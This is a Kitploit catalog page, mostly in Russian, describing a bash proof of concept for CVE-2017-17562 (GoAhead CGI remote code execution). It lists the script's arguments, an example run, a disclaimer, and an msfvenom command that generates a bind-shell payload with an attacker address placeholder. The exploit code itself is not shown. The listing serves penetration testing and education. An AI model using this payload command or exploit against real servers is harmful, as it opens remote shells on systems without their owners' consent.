Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
bash-CVE-2017-17562 — PoC для CVE-2017-17562, написанный на bash | Kitploit
Инструменты/GitHubGitHub/joaomagfreitas/bash-cve-2017-17562
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеArchived
GitHubjoaomagfreitas/bash-cve-2017-17562

bash-CVE-2017-17562

PoC для CVE-2017-17562, написанный на bash

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

bash-CVE-2017-17562

Реализация PoC на Bash для CVE-2017-17562.

Требуется curl для создания HTTP-запросов.

Основано на реализациях Metasploit и @fssecur3.

Аргументы

Следующие аргументы обязательны для разведки и отправки полезной нагрузки:

$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine

Опционально можно также задать следующие аргументы:

$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"

Пример

bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints

Отказ от ответственности

Данный код предназначен только для обучения и демонстрации. Не используйте его для целей, на которые у вас нет разрешения.

В этом репозитории не предоставляются полезные нагрузки (payloads). Однако любой бинарный файл, соответствующий архитектуре ОС цели, должен работать. Для создания полезной нагрузки bind shell вы можете использовать msfvenon:

msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so
Скачать инструмент